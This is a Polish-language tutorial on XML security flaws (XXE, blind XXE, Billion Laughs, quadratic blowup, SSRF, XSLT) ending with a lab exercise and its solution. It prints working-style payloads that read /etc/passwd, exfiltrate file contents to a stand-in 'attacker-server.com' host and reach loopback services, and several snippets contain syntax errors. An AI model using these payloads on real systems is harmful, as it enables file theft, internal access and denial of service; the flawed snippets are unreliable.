# Świat XML oraz jego wady bezpieczeństwa + SSRF

## Słowem wstępu
Zanim zacznę mówić o błędach muszę zrobić krótkie wprowadzenie do języka XML. Napomknę też od razu drugi błąd SSRF (Server-side request forgery), który wymieniony jest razem z podatnościami XML ze względu na to, że bardzo często kiedy występuje błąd bezpieczeństwa wykorzystujący XML, pojawia się również SSRF

## XML (Extensible Markup Language) - Co to jest?
XML to język znaczników, który służy do opisu różnych danych w bardziej poukładany i przejrzysty sposób. Bardzo często używa się go w różnych formatach takich jak .docx. Pozwala on na zapis danych w spoób obiektowy, podobnie jak format JSON.
Z racji tego, że jest to język, który prezentuje pewną strukturę to istnieją również aplikacje, która tą strukturę analizują, odczytują i modyfikują. Przykładem może być aplikacja, która pobiera z bazy danych produkty, które następnie są prezentowane w formacie dokumentu XML czy to dla użytkownika czy to dla aplikacji na potrzeby wygodniejszej pracy.
Przykładowy kod w języku XML wygląda np. tak:
```xml
<products>
    <laptops>
        <name> Gaming Laptop </name>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Jak widać język XML jest trochę podobny do HTML. Również korzysta się ze znaczników, jednakże sposób interpretacji oraz dowolność tworzenia jest zupełnie inna. 
Pierwsze pytanie, które może się nasunąć widząc ten kod, to takie, czy można zapisać tutaj znaki specjalne? I tak i nie.
Znaki takie jak
```haskell
<> // 
```
i inne są traktowane jako fragment składni. Rozwiązaniem tego problemu jest skorzystanie z encji.
```xml
<name >Gaming &gt; laptop </name>
```
będzie na wyjściu kodowane jako
```xml
<name> Gaming > laptop </name>
```
Jednakże nie można byłoby zapisać znaku ">" w formie zwykłej przed parsowaniem. Stąd użycie encji. Z tematem encji wiążą się ataki korzystające z XML.

## XML - Encje (XML - Entities)
Skorzystanie z różnego rodzaju encji przy znakach specjalnych jest jasne i nie widać tutaj problemu. Okazuje się jednak, że XML umożliwia definicje encji. W celu stworzenia nowej encji należy najpierw zadeklarować DTD (Document Type Definition), które powinno znajdować się na początku pliku. DTD umożliwia zdefiniowanie wymaganych tagów, atrybuty i wartości atrybutów dodatkowo, co jest bardzo interesujące, pozwala na definicję encji.
```xml
<!DOCTYPE data [
<!ENTITY special_product "Special Gaming Super Laptop"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Całe trzy linijki zajmuje definicja DTD i jej treść. W treści definiuje się nową encję o nazwie "special_product" i treści "Special Gaming Super Laptop". Od tej pory każde wywołanie tej nowej encji będzie związane z wyświetleniem napisu o super laptopie. 
Na razie nic groźnego jeszcze nie ma, ale okazuje się, że można definiować encję, które wskazują na zawartość pliku!
```xml
<!DOCTYPE data [
<!ENTITY special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
W wyniku analizy tego XML dostaniemy treść pliku `/etc/passwd` jako wartość encji special_product.
Widzimy już, że jeżeli aplikacja przyjmuje dane XML, a następnie zwraca je bez uprzedniej walidacji możemy uzyskać dostęp do plików na serwerze. Zanim jednak przejdę do konkretnej podatności opiszę jeszcze jeden rodzaj encji tzw. encje parametryczne.
Są to encje, które można deklarować, ale tylko DTD:
```xml
<!DOCTYPE data [
<!ENTITY % special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>%special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Jak widać różnica w zapisie polega na dodatkowym znaku "%" przy definicji i odwołaniu.

## XXE (XML External Entity)
Jak sama nazwa wskazuje atak typu XXE to atak z wykorzystaniem encji do zewnętrznych plików w XML.
```xml
<!DOCTYPE data [
<!ENTITY special_product SYSTEM "/etc/passwd"
]>
<products>
    <laptops>
        <name> Gaming Laptop </name>
        <s>&special_product;</s>
    </laptops>
    <cpu>
        <name> Intel core i5 6600k </name>
    </cpu>
</products>
```
Omówiony poprzednio przykład, przywołam jeszcze, żeby zwrócić uwagę na cztery problemy.
Pierwszym problemem jest oczywiście znalezienie odpowiedniego endpointu do którego można wysłać złośliwy XML. W dobie tak złożonych aplikacji nie stanowi to większego problemu. 
Ważny jest problem drugi, czyli znalezienie odpowiedniego tagu do wstrzyknięcia. Aplikacja, która odbiera XML bardzo często nie wykorzystuje wszystkich danych do późniejszego wyświetlenia. Może się okazać, że aplikacja pobiera dane użytkowników takie jak imię, nazwisko, rok urodzenia czy nazwa użytkownika, ale na wyjściu wyświetla tylko nazwę użytkownika. Wobec tego wstrzyknięcie encji w nie zadziała w przypadku wszystkich pól oprócz nazwy użytkownika, bo nigdzie się nie wyświetlą. 
Trzecim problemem jest znalezienie tagu, który zostaje po parsowaniu wyświetlony. 
Kolejnym problemem jest znajomość budowy XML. Musimy wiedzieć jakie tagi znajdują się w pliku XML, żeby wysłać złośliwe dane. Z reguły to nie problem, bo wymiana między użytkownikiem, a serwerem treści XML jest dosyć częsta. 
Ostatnim problemem jest parametr konkretnego tagu np:
```xml
<product id="123"> Laptop </product>
```
Na wyjściu dostajemy informacje
```sh
Produkt 123 został dodany do koszyka
```
Czyli należy wstrzyknąć złośliwą encję w sam parametr użytkownika. Niestety nie jest to możliwe, ale została jeszcze encja parametryczna, która w tym zadaniu świetnie pomoże. Z racji tego, że nie można w tym samym pliku zdefiniować encji w encji trzeba skorzystać z zewnętrznego pliku.

XML_attack_1:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://attacker-server.com/exploit.xml"
%external;
%x;
]>
<product id="123&s;"> Laptop </product>
```

XML_attack_2:
```xml
<!ENTITY %x '<!ENTITY s "%file;">'>
```
W pierwszym pliku jest zdefiniowana encja file, która wskazuje na zawartość pliku `/etc/passwd`. Kolejna encja external ładuje encję z zewnętrznego pliku na serwerze atakującego. W którym znajdują się dwie encje %x i &s;. 

Pierwsza wskazuję na drugą, która wskazuje na encje %file czyli zawartość pliku passwd. Takie zagmatwane i zagnieżdżone użycie pozwala na uniknięcie błędu parsera przy użyciu encji w encji.

## Blind XXE
Wspomniałem wyżej o kilku problemach z czego kolejny z nich ma swoje rozwiązanie. Jeżeli aplikacja nie zwraca informacji o operacji można wydać specjalne zapytanie do serwera nad którym mamy kontrolę.
Działa to na bardzo podobnej zasadzie co ostatni przykład, ale ma pewne różnice:
XML_attack_1:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://attacker-server.com/exploit.xml"
%external;
%x;
%x2;
]>
<product id="123&s;"> Laptop </product>
```
XML_attack_2:
```xml
<!ENTITY %x '<!ENTITY &#x25; x2 "https://attacker-server.com/?file=%file;">'>
```
Po pierwsze, w pierwszym pliku wyświetlamy jeszcze jedną encję, dlatego, że w drugim użyliśmy dodatkowej encji do zdefiniowania odwołania do zewnętrznego serwera. Atakujący monitorujący swój serwer po wykonaniu takiego kodu dostanie:
```sh
GET /?file=tresc_pliku
```
Warto dodać, że $#25 to zakodowany znak procenta.

## Billion Laughs
Atak typu Billion Laughs jest atakiem typu DoS, a jego nazwa pochodzi z nazwy encji używanych często w przykładach tego błędu czyli &lol; (lol to śmiech - z ang. laughing out loud). Natomiast billion ze względu na zagnieżdżone encje, które teraz wyjaśnię.
Skoro można robić encję w encji to możemy zdefiniować następujące encje:
```xml
<DOCTYPE lolz[
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;">
<!ENTITY Lol2 "&lol1;&lol1;&lol1;">
]>
<data>&lolg2;</data>
```
Jak widać wielkość encji powiększa się bardzo szybko. Encja lol jeden ma trzy wyrazy lol, a encja lol2 już 27 wyrazów. Jeżeli zdefiniowałbym 6 encji po 10 w każdej z treścią jednej litery to na wyjściu aplikacja musiałaby przetworzyć około miliona bajtów czyli 1MB!. Za to ja wysłałbym dane rzędu bajtów, nawet nie kB. Dla pewnej wielkości aplikacja nie byłaby już w stanie przetworzyć zapytania i albo by je ciągle procesowała, albo zapełniłaby przestrzeń dyskową w obu przypadkach wywołująć DoS.

## Quadratic Blowup
W pewnym momencie powstała odpowiedź na atak typu Billion Laughs i parsery wprowadziły ograniczenia w kwestii ilości zagnieżdżeń. Jednakże nadal można wysłać encję składającą się z 10 tys. znaków powtórzoną np. 10 tys. razy. Jest to co prawda mniej wydajne rozwiązanie, ale nadal skuteczne. Jeżeli parser zezwala na zaledwie 10 zagnieżdżeń, można spróbować połączyć oba ataki i zdefiniować encję o długości 10 tys. znaków, następnie powtórzyć encję 10 tys. razy i za każdym razem zagnieżdżać. Efekt będzie liczony w TB danych co na pewno zatrzyma aplikację prowadząc do ataku typu DoS.
```xml
<DOCTYPE lolz[
<!ENTITY lol "lol [10tys razy]">
<!ENTITY lol1 "&lol;&lol;&lol; [10 tys.]">
// i jeszcze 8 takich encji
]>
<data>&lolg2;</data>
```

## SSRF
Server-Side Request Forgery to atak, który polega na uzyskaniu dostępu do serwerów za serwerem właściwym. Mogą być to maszyny lokalne lub inne serwery do których nie ma dostępu bezpośrednio z Internetu, a jedynie z sieci w której znajduje się serwer. Miejsca w których może występować ta luka jest wiele. Najczęściej można spotkać się z nią kiedy jakieś pliki włączane są z zewnętrznego serwera w formie parametrów np:
```html
/?file=https://server.com/main.js
```
W takim przypadku można  spróbować wydawać zapytania np. pod adresy lokalne lub loopback:
```html
http://127.0.0.1:80/
```
W ten sposób można np. przeskanować porty w sieci lokalnej i uzyskać dostęp do usług, które najpewniej nie są zabezpieczone tak jak serwer wystawiony na świat. Dodatkowo często można kombinować z protokołami np.
```sh
file:///etc/passwd
```
pozwala na pobieranie zawartości pliku `/etc/passwd`.
Nic nie stoi na przeszkodzie, żeby pobierać też własne pliki udostępnione na kontrolowanym przez siebie serwerze.
```sh
https://evil-site.com/evil.php
```
Często w mniejszych aplikacjach powstają filtry anty-SSRF, które mają blokować odwołania do loopback. Często jednak nieskutecznie, bo blokowany jest adres 127.0.0.1, a 127.0.0.3 czy 127.0.1.1 też jest adresem pętli zwrotnej. Dodatkowo nawet jeżeli te adresy są zablokowane za pomocą blacklisty to nadal często można odnieść się do pętli zwrotnej przez adres IPv6 ::1

## XXE + SSRF
Na samym początku wspomniałem, że często z podatnością typu XXE wiąże się SSRF. Przedstawię więc krótki plik XML, który wykorzystuje obie te podatności:
```xml
<DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "http://127.0.0.1"
%external;
%x;
%x2;
]>
<product id="123&s;"> Laptop </product>
```
Tak jak wspomniałem przy okazji XXE. Atakujący może często definiować swój serwer, a skoro tak to nic nie szkodzi na przeszkodzie, żeby zdefiniować pętlę zwrotną lub jakikolwiek serwer lokalny. Taka podatność ma te same możliwości SSRF tj. można np. skanować porty omijając firewalla. Można odwoływać się do protokołu file:// co może przydać się kiedy bezpośrednie odwołanie do plików jest zablokowane.

## XSLT - wykonywanie złośliwego kodu
XSLT jest językiem przekształceń, który pozwala przekształcać różne typy zapisu XML między sobą. Skoro język XSLT pracuję na XML to najpewniej jest szansa wykorzystania encji, które mogą posłużyć chociażby do ataku SSRF. I te twierdzenie jest w połowie trafne, bo wykorzystuje się podobny mechanizm, który świetnie radzi sobie z SSRF, ale niestety już nie z czytaniem plików. Wspominałem o tym wcześniej, że czasami SSRF to jedyny sposób na odczytanie pliku pomimo, że istnieje błąd bezpieczeństwa w parsowaniu XMLa.
```xslt
<xs1:template match="/">
    <xs1:value-of-select="document('http://127.0.0.1:80')"/>
</xs1:template match ="/">
```
Oczywiście nic nie stoi na przeszkodzie, żeby skorzystać z file://.

## XXE + SSRF Ćwiczenie
Celem tego zadania jest odczytanie flagi z pętli zwrotnej (127.0.0.1) na porcie 91. Należy zauważyć, że bezpośrednio z Internetu nie ma dostępu do tego serwera.
Dodatkowo XXE znajduje się w tagu <name>, a sam XML jest zbudowany w ten sposób
```xml
<root>
    <name></name>
</root>
```
Ćwiczenie znajduje się pod adresem:
```html
http://vuln.vms.perkmylife.com:83
```

Rozwiązanie:
Warto zauważyć, że przy formularzu widnieje tag `<data></data>` co może sugerować, że jest to jeden z tagów używanych w tej aplikacji.
Przygotujmy prostego XML'a:
```xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<root>
    <name>&xxe;</name>
</root>
```
Tak zdefiniowany plik XML zwraca zawartość `/etc/passwd`. Jednakże nadal nie wiemy gdzie może znajdować się aplikacja na porcie 91. Dużo wygodniej byłoby wykorzystać SSRF, żeby pobrać stronę główną pętli zwrotnej.
```xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:91/flag.txt">
]>
<root>
    <name>&xxe;</name>
</root>
```
Na wyjściu dostajemy pożądaną flagę wykorzystując XXE i SSRF jednocześnie.

> @todo, commit all these files server side, exploits to /src/vuln/